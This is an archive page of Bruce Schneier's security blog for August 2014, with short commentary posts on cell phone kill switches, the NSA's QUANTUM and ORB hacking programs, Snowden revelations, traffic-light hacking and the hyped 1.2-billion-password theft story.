Blog: August 2014 Archives

Cell Phone Kill Switches Mandatory in California

California passed a kill-switch law, meaning that all cell phones sold in California must have the capability to be remotely turned off. It was sold as an antitheft measure. If the phone company could remotely render a cell phone inoperative, there would be less incentive to steal one.

I worry more about the side effects: once the feature is in place, it can be used by all sorts of people for all sorts of reasons.

The law raises concerns about how the switch might be used or abused, because it also provides law enforcement with the authority to use the feature to kill phones. And any feature accessible to consumers and law enforcement could be accessible to hackers, who might use it to randomly kill phones for kicks or revenge, or to perpetrators of crimes who might—depending on how the kill switch is implemented—be able to use it to prevent someone from calling for help.

“It’s great for the consumer, but it invites a lot of mischief,” says Hanni Fakhoury, staff attorney for the Electronic Frontier Foundation, which opposes the law. “You can imagine a domestic violence situation or a stalking context where someone kills [a victim’s] phone and prevents them from calling the police or reporting abuse. It will not be a surprise when you see it being used this way.”

I wrote about this in 2008, more generally:

The possibilities are endless, and very dangerous. Making this work involves building a nearly flawless hierarchical system of authority. That’s a difficult security problem even in its simplest form. Distributing that system among a variety of different devices—computers, phones, PDAs, cameras, recorders—with different firmware and manufacturers, is even more difficult. Not to mention delegating different levels of authority to various agencies, enterprises, industries and individuals, and then enforcing the necessary safeguards.

Once we go down this path—giving one device authority over other devices—the security problems start piling up. Who has the authority to limit functionality of my devices, and how do they get that authority? What prevents them from abusing that power? Do I get the ability to override their limitations? In what circumstances, and how? Can they override my override?

The law only affects California, but phone manufacturers won’t sell two different phones. So this means that all cell phones will eventually have this capability. And, of course, the procedural controls and limitations written into the California law don’t apply elsewhere

EDITED TO ADD (9/12): Users can opt out, at least for now: “The bill would authorize an authorized user to affirmatively elect to
disable or opt-out of the technological solution at any time.”

How the bill can be used to disrupt protests.

Posted on August 29, 2014 at 12:31 PM59 Comments

ISIS Threatens US with Terrorism

They’re openly mocking our profiling.

But in several telephone conversations with a Reuters reporter over the past few months, Islamic State fighters had indicated that their leader, Iraqi Abu Bakr al-Baghdadi, had several surprises in store for the West.

They hinted that attacks on American interests or even U.S. soil were possible through sleeper cells in Europe and the United States.

“The West are idiots and fools. They think we are waiting for them to give us visas to go and attack them or that we will attack with our beards or even Islamic outfits,” said one.

“They think they can distinguish us these days ­ they are fools and more than that they don’t know we can play their game in intelligence. They infiltrated us with those who pretend to be Muslims and we have also penetrated them with those who look like them.”

I am reminded of my debate on airport profiling with Sam Harris, particularly my initial response to his writings.

Posted on August 29, 2014 at 6:08 AM76 Comments

Hacking Traffic Lights

New paper: “Green Lights Forever: Analyzing the Security of Traffic Infrastructure,” Branden Ghena, William Beyer, Allen Hillaker, Jonathan Pevarnek, and J. Alex Halderman.

Abstract: The safety critical nature of traffic infrastructure requires that it be secure against computer-based attacks, but this is not always the case. We investigate a networked traffic signal system currently deployed in the United States and discover a number of security flaws that exist due to systemic failures by the designers. We leverage these flaws to create attacks which gain control of the system, and we successfully demonstrate them on the deployment in coordination with authorities. Our attacks show that an adversary can control traffic infrastructure to cause disruption, degrade safety, or gain an unfair advantage. We make recommendations on how to improve existing systems and discuss the lessons learned for embedded systems security in general.

News article.

Posted on August 28, 2014 at 6:14 AM16 Comments

People Are Not Very Good at Matching Photographs to People

We have an error rate of about 15%:

Professor Mike Burton, Sixth Century Chair in Psychology at the University of Aberdeen said: “Psychologists identified around a decade ago that in general people are not very good at matching a person to an image on a security document.

“Familiar faces trigger special processes in our brain—we would recognise a member of our family, a friend or a famous face within a crowd, in a multitude of guises, venues, angles or lighting conditions. But when it comes to identifying a stranger it’s another story.

“The question we asked was does this fundamental brain process that occurs have any real importance for situations such as controlling passport issuing ­ and we found that it does.”

The ability of Australian passport officers, for whom accurate face matching is central to their job and vital to border security, was tested in the latest study, which involved researchers from the Universities of Aberdeen, York and New South Wales Australia.

In one test, passport officers had to decide whether or not a photograph of an individual presented on their computer screen matched the face of a person standing in front of their desk.

It was found that on 15% of trials the officers decided that the photograph on their screen matched the face of the person standing in front of them, when in fact, the photograph showed an entirely different person.

Posted on August 25, 2014 at 7:08 AM29 Comments

Friday Squid Blogging: Squid Boats Illuminate Bangkok from Space

Really:

To attract the phytoplankton, fishermen suspend green lights from their boats to illuminate the sea. When the squid chase after their dinner, they’re drawn closer to the surface, making it easier for fishermen to net them. Squid boats often carry up to 100 of these green lamps, which generate hundreds of kilowatts of electricity—making them visible, it appears, even from space.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Posted on August 22, 2014 at 4:49 PM144 Comments

Disguising Exfiltrated Data

There’s an interesting article on a data exfiltration technique.

What was unique about the attackers was how they disguised traffic between the malware and command-and-control servers using Google Developers and the public Domain Name System (DNS) service of Hurricane Electric, based in Fremont, Calif.

In both cases, the services were used as a kind of switching station to redirect traffic that appeared to be headed toward legitimate domains, such as adobe.com, update.adobe.com, and outlook.com.

[…]

The malware disguised its traffic by including forged HTTP headers of legitimate domains. FireEye identified 21 legitimate domain names used by the attackers.

In addition, the attackers signed the Kaba malware with a legitimate certificate from a group listed as the “Police Mutual Aid Association” and with an expired certificate from an organization called “MOCOMSYS INC.”

In the case of Google Developers, the attackers used the service to host code that decoded the malware traffic to determine the IP address of the real destination and redirect the traffic to that location.

Google Developers, formerly called Google Code, is the search engine’s website for software development tools, APIs, and documentation on working with Google developer products. Developers can also use the site to share code.

With Hurricane Electric, the attacker took advantage of the fact that its domain name servers were configured, so anyone could register for a free account with the company’s hosted DNS service.

The service allowed anyone to register a DNS zone, which is a distinct, contiguous portion of the domain name space in the DNS. The registrant could then create A records for the zone and point them to any IP address.

Honestly, this looks like a government exfiltration technique, although it could be evidence that the criminals are getting even more sophisticated.

Posted on August 21, 2014 at 6:08 AM24 Comments

US Air Force is Focusing on Cyber Deception

The US Air Force is focusing on cyber deception next year:

Background: Deception is a deliberate act to conceal activity on our networks, create uncertainty and confusion against the adversary’s efforts to establish situational awareness and to influence and misdirect adversary perceptions and decision processes. Military deception is defined as “those actions executed to deliberately mislead adversary decision makers as to friendly military capabilities, intentions, and operations, thereby causing the adversary to take specific actions (or inactions) that will contribute to the accomplishment of the friendly mission.” Military forces have historically used techniques such as camouflage, feints, chaff, jammers, fake equipment, false messages or traffic to alter an enemy’s perception of reality. Modern day military planners need a capability that goes beyond the current state-of-the-art in cyber deception to provide a system or systems that can be employed by a commander when needed to enable deception to be inserted into defensive cyber operations.

Relevance and realism are the grand technical challenges to cyber deception. The application of the proposed technology must be relevant to operational and support systems within the DoD. The DoD operates within a highly standardized environment. Any technology that significantly disrupts or increases the cost to the standard of practice will not be adopted. If the technology is adopted, the defense system must appear legitimate to the adversary trying to exploit it.

Objective: To provide cyber-deception capabilities that could be employed by commanders to provide false information, confuse, delay, or otherwise impede cyber attackers to the benefit of friendly forces. Deception mechanisms must be incorporated in such a way that they are transparent to authorized users, and must introduce minimal functional and performance impacts, in order to disrupt our adversaries and not ourselves. As such, proposed techniques must consider how challenges relating to transparency and impact will be addressed. The security of such mechanisms is also paramount, so that their power is not co-opted by attackers against us for their own purposes. These techniques are intended to be employed for defensive purposes only on networks and systems controlled by the DoD.

Advanced techniques are needed with a focus on introducing varying deception dynamics in network protocols and services which can severely impede, confound, and degrade an attacker’s methods of exploitation and attack, thereby increasing the costs and limiting the benefits gained from the attack. The emphasis is on techniques that delay the attacker in the reconnaissance through weaponization stages of an attack and also aid defenses by forcing an attacker to move and act in a more observable manner. Techniques across the host and network layers or a hybrid thereof are of interest in order to provide AF cyber operations with effective, flexible, and rapid deployment options.

More discussion here.

Posted on August 20, 2014 at 5:08 AM41 Comments

The Security of al Qaeda Encryption Software

The web intelligence firm Recorded Future has posted two stories about how al Qaeda is using new encryption software in response to the Snowden disclosures. NPR picked up the story a week later.

Former NSA Chief Council Stewart Baker uses this as evidence that Snowden has harmed America. Glenn Greenwald calls this “CIA talking points” and shows that al Qaeda was using encryption well before Snowden. Both quote me heavily, Baker casting me as somehow disingenuous on this topic.

Baker is conflating my stating of two cryptography truisms. The first is that cryptography is hard, and you’re much better off using well-tested public algorithms than trying to roll your own. The second is that cryptographic implementation is hard, and you’re much better off using well-tested open-source encryption software than you are trying to roll your own. Admittedly, they’re very similar, and sometimes I’m not as precise as I should be when talking to reporters.

This is what I wrote in May:

I think this will help US intelligence efforts. Cryptography is hard, and the odds that a home-brew encryption product is better than a well-studied open-source tool is slight. Last fall, Matt Blaze said to me that he thought that the Snowden documents will usher in a new dark age of cryptography, as people abandon good algorithms and software for snake oil of their own devising. My guess is that this an example of that.

Note the phrase “good algorithms and software.” My intention was to invoke both truisms in the same sentence. That paragraph is true if al Qaeda is rolling their own encryption algorithms, as Recorded Future reported in May. And it remains true if al Qaeda is using algorithms like my own Twofish and rolling their own software, as Recorded Future reported earlier this month. Everything we know about how the NSA breaks cryptography is that they attack the implementations far more successfully than the algorithms.

My guess is that in this case they don’t even bother with the encryption software; they just attack the users’ computers. There’s nothing that screams “hack me” more than using specially designed al Qaeda encryption software. There’s probably a QUANTUMINSERT attack and FOXACID exploit already set on automatic fire.

I don’t want to get into an argument about whether al Qaeda is altering its security in response to the Snowden documents. Its members would be idiots if they did not, but it’s also clear that they were designing their own cryptographic software long before Snowden. My guess is that the smart ones are using public tools like OTR and PGP and the paranoid dumb ones are using their own stuff, and that the split was the same both pre- and post-Snowden.

Posted on August 19, 2014 at 6:11 AM33 Comments

QUANTUM Technology Sold by Cyberweapons Arms Manufacturers

Last October, I broke the story about the NSA’s top secret program to inject packets into the Internet backbone: QUANTUM. Specifically, I wrote about how QUANTUMINSERT injects packets into existing Internet connections to redirect a user to an NSA web server codenamed FOXACID to infect the user’s computer. Since then, we’ve learned a lot more about how QUANTUM works, and general details of many other QUANTUM programs.

These techniques make use of the NSA’s privileged position on the Internet backbone. It has TURMOIL computers directly monitoring the Internet infrastructure at providers in the US and around the world, and a system called TURBINE that allows it to perform real-time packet injection into the backbone. Still, there’s nothing about QUANTUM that anyone else with similar access can’t do. There’s a hacker tool called AirPwn that basically performs a QUANTUMINSERT attack on computers on a wireless network.

A new report from Citizen Lab shows that cyberweapons arms manufacturers are selling this type of technology to governments around the world: the US DoD contractor CloudShield Technologies, Italy’s Hacking Team, and Germany’s and the UK’s Gamma International. These programs intercept web connections to sites like Microsoft and Google—YouTube is specially mentioned—and inject malware into users’ computers.

Turkmenistan paid a Swiss company, Dreamlab Technologies—somehow related to the cyberweapons arms manufacturer Gamma International—just under $1M for this capability. Dreamlab also installed the software in Oman. We don’t know what other countries have this capability, but the companies here routinely sell hacking software to totalitarian countries around the world.

There’s some more information in this Washington Post article, and this essay on the Intercept.

In talking about the NSA’s capabilities, I have repeatedly said that today’s secret NSA programs are tomorrow’s PhD dissertations and the next day’s hacker tools. This is exactly what we’re seeing here. By developing these technologies instead of helping defend against them, the NSA—and GCHQ and CSEC—are contributing to the ongoing insecurity of the Internet.

Related: here is an open letter from Citizen Lab’s Ron Deibert to Hacking Team about the nature of Citizen Lab’s research and the misleading defense of Hacking Team’s products.

Posted on August 18, 2014 at 11:14 AM31 Comments

NSA/GCHQ/CSEC Infecting Innocent Computers Worldwide

There’s a new story on the c’t magazin website about a 5-Eyes program to infect computers around the world for use as launching pads for attacks. These are not target computers; these are innocent third parties.

The article actually talks about several government programs. HACIENDA is a GCHQ program to port-scan entire countries, looking for vulnerable computers to attack. According to the GCHQ slide from 2009, they’ve completed port scans of 27 different countries and are prepared to do more.

The point of this is to create ORBs, or Operational Relay Boxes. Basically, these are computers that sit between the attacker and the target, and are designed to obscure the true origins of an attack. Slides from the Canadian CSEC talk about how this process is being automated: “2-3 times/year, 1 day focused effort to acquire as many new ORBs as possible in as many non 5-Eyes countries as possible.” They’ve automated this process into something codenamed LANDMARK, and together with a knowledge engine codenamed OLYMPIA, 24 people were able to identify “a list of 3000+ potential ORBs” in 5-8 hours. The presentation does not go on to say whether all of those computers were actually infected.

Slides from the UK’s GCHQ also talk about ORB detection, as part of a program called MUGSHOT. It, too, is happy with the automatic process: “Initial ten fold increase in Orb identification rate over manual process.” There are also NSA slides that talk about the hacking process, but there’s not much new in them.

The slides never say how many of the “potential ORBs” CSEC discovers or the computers that register positive in GCHQ’s “Orb identification” are actually infected, but they’re all stored in a database for future use. The Canadian slides talk about how some of that information was shared with the NSA.

Increasingly, innocent computers and networks are becoming collateral damage, as countries use the Internet to conduct espionage and attacks against each other. This is an example of that. Not only do these intelligence services want an insecure Internet so they can attack each other, they want an insecure Internet so they can use innocent third parties to help facilitate their attacks.

The story contains formerly TOP SECRET documents from the US, UK, and Canada. Note that Snowden is not mentioned at all in this story. Usually, if the documents the story is based on come from Snowden, the reporters say that. In this case, the reporters have said nothing about where the documents come from. I don’t know if this is an omission—these documents sure look like the sorts of things that come from the Snowden archive—or if there is yet another leaker.

Posted on August 18, 2014 at 5:45 AM60 Comments

New Snowden Interview in Wired

There’s a new article on Edward Snowden in Wired. It’s written by longtime NSA watcher James Bamford, who interviewed Snowden in Moscow.

There’s lots of interesting stuff in the article, but I want to highlight two new revelations. One is that the NSA was responsible for a 2012 Internet blackout in Syria:

One day an intelligence officer told him that TAO­—a division of NSA hackers­—had attempted in 2012 to remotely install an exploit in one of the core routers at a major Internet service provider in Syria, which was in the midst of a prolonged civil war. This would have given the NSA access to email and other Internet traffic from much of the country. But something went wrong, and the router was bricked instead—rendered totally inoperable. The failure of this router caused Syria to suddenly lose all connection to the Internet—although the public didn’t know that the US government was responsible….

Inside the TAO operations center, the panicked government hackers had what Snowden calls an “oh shit” moment. They raced to remotely repair the router, desperate to cover their tracks and prevent the Syrians from discovering the sophisticated infiltration software used to access the network. But because the router was bricked, they were powerless to fix the problem.

Fortunately for the NSA, the Syrians were apparently more focused on restoring the nation’s Internet than on tracking down the cause of the outage. Back at TAO’s operations center, the tension was broken with a joke that contained more than a little truth: “If we get caught, we can always point the finger at Israel.”

Other articles on Syria.

The other is something called MONSTERMIND, which is an automatic strike-back system for cyberattacks.

The program, disclosed here for the first time, would automate the process of hunting for the beginnings of a foreign cyberattack. Software would constantly be on the lookout for traffic patterns indicating known or suspected attacks. When it detected an attack, MonsterMind would automatically block it from entering the country—a “kill” in cyber terminology.

Programs like this had existed for decades, but MonsterMind software would add a unique new capability: Instead of simply detecting and killing the malware at the point of entry, MonsterMind would automatically fire back, with no human involvement.

A bunch more articles and stories on MONSTERMIND.

And there’s this 2011 photo of Snowden and former NSA Director Michael Hayden.

Posted on August 14, 2014 at 1:02 AM86 Comments

Security as Interface Guarantees

This is a smart and interesting blog post:

I prefer to think of security as a class of interface guarantee. In particular, security guarantees are a kind of correctness guarantee. At every interface of every kind ­ user interface, programming language syntax and semantics, in-process APIs, kernel APIs, RPC and network protocols, ceremonies ­—explicit and implicit design guarantees (promises, contracts) are in place, and determine the degree of “security” (however defined) the system can possibly achieve.

Design guarantees might or might not actually hold in the implementation ­—software tends to have bugs, after all. Callers and callees can sometimes (but not always) defend themselves against untrustworthy callees and callers (respectively) in various ways that depend on the circumstances and on the nature of caller and callee. In this sense an interface is an attack surface—­ but properly constructed, it can also be a defense surface.

[…]

But also it’s an attempt to re-frame security engineering in a way that allows us to imagine more and better solutions to security problems. For example, when you frame your interface as an attack surface, you find yourself ever-so-slightly in a panic mode, and focus on how to make the surface as small as possible. Inevitably, this tends to lead to cat-and-mouseism and poor usability, seeming to reinforce the false dichotomy. If the panic is acute, it can even lead to nonsensical and undefendable interfaces, and a proliferation of false boundaries (as we saw with Windows UAC).

If instead we frame an interface as a defense surface, we are in a mindset that allows us to treat the interface as a shield: built for defense, testable, tested, covering the body; but also light-weight enough to carry and use effectively. It might seem like a semantic game; but in my experience, thinking of a boundary as a place to build a point of strength rather than thinking of it as something that must inevitably fall to attack leads to solutions that in fact withstand attack better while also functioning better for friendly callers.

I also liked the link at the end.

Posted on August 13, 2014 at 2:11 PM19 Comments

Automatic Scanning for Highly Stressed Individuals

This borders on ridiculous:

Chinese scientists are developing a mini-camera to scan crowds for highly stressed individuals, offering law-enforcement officers a potential tool to spot would-be suicide bombers.

[…]

“They all looked and behaved as ordinary people but their level of mental stress must have been extremely high before they launched their attacks. Our technology can detect such people, so law enforcement officers can take precautions and prevent these tragedies,” Chen said.

Officers looking through the device at a crowd would see a mental “stress bar” above each person’s head, and the suspects highlighted with a red face.

The researchers said they were able to use the technology to tell the difference between high-blood oxygen levels produced by stress rather than just physical exertion.

I’m not optimistic about this technology.

Posted on August 13, 2014 at 6:20 AM60 Comments

Irrational Fear of Risks Against Our Children

There’s a horrible story of a South Carolina mother arrested for letting her 9-year-old daughter play alone at a park while she was at work. The article linked to another article about a woman convicted of “contributing to the delinquency of a minor” for leaving her 4-year-old son in the car for a few minutes. That article contains some excellent commentary by the very sensible Free Range Kids blogger Lenore Skenazy:

“Listen,” she said at one point. “Let’s put aside for the moment that by far, the most dangerous thing you did to your child that day was put him in a car and drive someplace with him. About 300 children are injured in traffic accidents every day—and about two die. That’s a real risk. So if you truly wanted to protect your kid, you’d never drive anywhere with him. But let’s put that aside. So you take him, and you get to the store where you need to run in for a minute and you’re faced with a decision. Now, people will say you committed a crime because you put your kid ‘at risk.’ But the truth is, there’s some risk to either decision you make.” She stopped at this point to emphasize, as she does in much of her analysis, how shockingly rare the abduction or injury of children in non-moving, non-overheated vehicles really is. For example, she insists that statistically speaking, it would likely take 750,000 years for a child left alone in a public space to be snatched by a stranger. “So there is some risk to leaving your kid in a car,” she argues. It might not be statistically meaningful but it’s not nonexistent. The problem is,”she goes on, “there’s some risk to every choice you make. So, say you take the kid inside with you. There’s some risk you’ll both be hit by a crazy driver in the parking lot. There’s some risk someone in the store will go on a shooting spree and shoot your kid. There’s some risk he’ll slip on the ice on the sidewalk outside the store and fracture his skull. There’s some risk no matter what you do. So why is one choice illegal and one is OK? Could it be because the one choice inconveniences you, makes your life a little harder, makes parenting a little harder, gives you a little less time or energy than you would have otherwise had?”

Later on in the conversation, Skenazy boils it down to this. “There’s been this huge cultural shift. We now live in a society where most people believe a child can not be out of your sight for one second, where people think children need constant, total adult supervision. This shift is not rooted in fact. It’s not rooted in any true change. It’s imaginary. It’s rooted in irrational fear.”

Skenazy has some choice words about the South Carolina story as well:

But, “What if a man would’ve come and snatched her?” said a woman interviewed by the TV station.

To which I must ask: In broad daylight? In a crowded park? Just because something happened on Law & Order doesn’t mean it’s happening all the time in real life. Make “what if?” thinking the basis for an arrest and the cops can collar anyone. “You let your son play in the front yard? What if a man drove up and kidnapped him?” “You let your daughter sleep in her own room? What if a man climbed through the window?” etc.

These fears pop into our brains so easily, they seem almost real. But they’re not. Our crime rate today is back to what it was when gas was 29 cents a gallon, according to The Christian Science Monitor. It may feel like kids are in constant danger, but they are as safe (if not safer) than we were when our parents let us enjoy the summer outside, on our own, without fear of being arrested.

Yes.

Posted on August 11, 2014 at 9:34 AM92 Comments

Eavesdropping by Visual Vibrations

Researchers are able to recover sound through soundproof glass by recording the vibrations of a plastic bag.

Researchers at MIT, Microsoft, and Adobe have developed an algorithm that can reconstruct an audio signal by analyzing minute vibrations of objects depicted in video. In one set of experiments, they were able to recover intelligible speech from the vibrations of a potato-chip bag photographed from 15 feet away through soundproof glass.

In other experiments, they extracted useful audio signals from videos of aluminum foil, the surface of a glass of water, and even the leaves of a potted plant.

This isn’t a new idea. I remember military security policies requiring people to close the window blinds to prevent someone from shining a laser on the window and recovering the sound from the vibrations. But both the camera and processing technologies are getting better.

News story.

Posted on August 8, 2014 at 11:50 AM25 Comments

The US Intelligence Community has a Third Leaker

Ever since the Intercept published this story about the US government’s Terrorist Screening Database, the press has been writing about a “second leaker”:

The Intercept article focuses on the growth in U.S. government databases of known or suspected terrorist names during the Obama administration.

The article cites documents prepared by the National Counterterrorism Center dated August 2013, which is after Snowden left the United States to avoid criminal charges.

Greenwald has suggested there was another leaker. In July, he said on Twitter “it seems clear at this point” that there was another.

Everyone’s miscounting. This is the third leaker:

  • Leaker #1: Edward Snowden.
  • Leaker #2: The person who is passing secrets to Jake Appelbaum, Laura Poitras and others in Germany: the Angela Merkel surveillance story, the TAO catalog, the X-KEYSCORE rules. My guess is that this is either an NSA employee or contractor working in Germany, or someone from German intelligence who has access to NSA documents. Snowden has said that he is not the source for the Merkel story, and Greenwald has confirmed that the Snowden documents are not the source for the X-KEYSCORE rules. I have also heard privately that the NSA knows that this is a second leaker.
  • Leaker #3: This new leaker, with access to a different stream of information (the NCTC is not the NSA), whom the Intercept calls “a source in the intelligence community.”

Harvard Law School professor Yochai Benkler has written an excellent law-review article on the need for a whistleblower defense. And there’s this excellent article by David Pozen on why government leaks are, in general, a good thing.

Posted on August 7, 2014 at 12:14 PM53 Comments

Over a Billion Passwords Stolen?

I’ve been doing way too many media interviews over this weird New York Times story that a Russian criminal gang has stolen over 1.2 billion passwords.

As expected, the hype is pretty high over this. But from the beginning, the story didn’t make sense to me. There are obvious details missing: are the passwords in plaintext or encrypted, what sites are they for, how did they end up with a single criminal gang? The Milwaukee company that pushed this story, Hold Security, isn’t a company that I had ever heard of before. (I was with Howard Schmidt when I first heard this story. He lives in Wisconsin, and he had never heard of the company before, either.) The New York Times writes that “a security expert not affiliated with Hold Security analyzed the database of stolen credentials and confirmed it was authentic,” but we’re not given any details. This felt more like a PR story from the company than anything real.

Yesterday, Forbes wrote that Hold Security is charging people $120 to tell them if they’re in the stolen-password database:

“In addition to continuous monitoring, we will also check to see if your company has been a victim of the latest CyberVor breach,” says the site’s description of the service using its pet name for the most recent breach. “The service starts from as low as 120$/month and comes with a 2-week money back guarantee, unless we provide any data right away.”

Shortly after Wall Street Journal reporter Danny Yadron linked to the page on Twitter and asked questions about it, the firm replaced the description of the service with a “coming soon” message.

Holden says by email that the service will actually be $10/month and $120/year. “We are charging this symbolical fee to recover our expense to verify the domain or website ownership,” he says by email. “While we do not anticipate any fraud, we need to be cognizant of its potential. The other thing to consider, the cost that our company must undertake to proactively reach out to a company to identify the right individual(s) to inform of a breach, prove to them that we are the ‘good guys’. Believe it or not, it is a hard and often thankless task.”

This story is getting squirrelier and squirrelier. Yes, security companies love to hype the threat to sell their products and services. But this goes further: single-handedly trying to create a panic, and then profiting off that panic.

I don’t know how much of this story is true, but what I was saying to reporters over the past two days is that it’s evidence of how secure the Internet actually is. We’re not seeing massive fraud or theft. We’re not seeing massive account hijacking. A gang of Russian hackers has 1.2 billion passwords—they’ve probably had most of them for a year or more—and everything is still working normally. This sort of thing is pretty much universally true. You probably have a credit card in your wallet right now whose number has been stolen. There are zero-day vulnerabilities being discovered right now that can be used to hack your computer. Security is terrible everywhere, and it it’s all okay. This is a weird paradox that we’re used to by now.

Oh, and if you want to change your passwords, here’s my advice.

EDITED TO ADD (8/7): Brian Krebs vouches for Hold Security. On the other hand, it had no web presence until this story hit. Despite Krebs, I’m skeptical.

EDITED TO ADD (8/7): Here’s an article about Hold Security from February with suspiciously similar numbers.

EDITED TO ADD (8/9): Another skeptical take.

Posted on August 7, 2014 at 7:45 AM57 Comments

Former NSA Director Patenting Computer Security Techniques

Former NSA Director Keith Alexander is patenting a variety of techniques to protect computer networks. We’re supposed to believe that he developed these on his own time and they have nothing to do with the work he did at the NSA, except for the parts where they obviously did and therefore are worth $1 million per month for companies to license.

No, nothing fishy here.

EDITED TO ADD (8/14): Some more commentary.

Posted on August 4, 2014 at 6:26 AM44 Comments

Sidebar photo of Bruce Schneier by Joe MacInnis.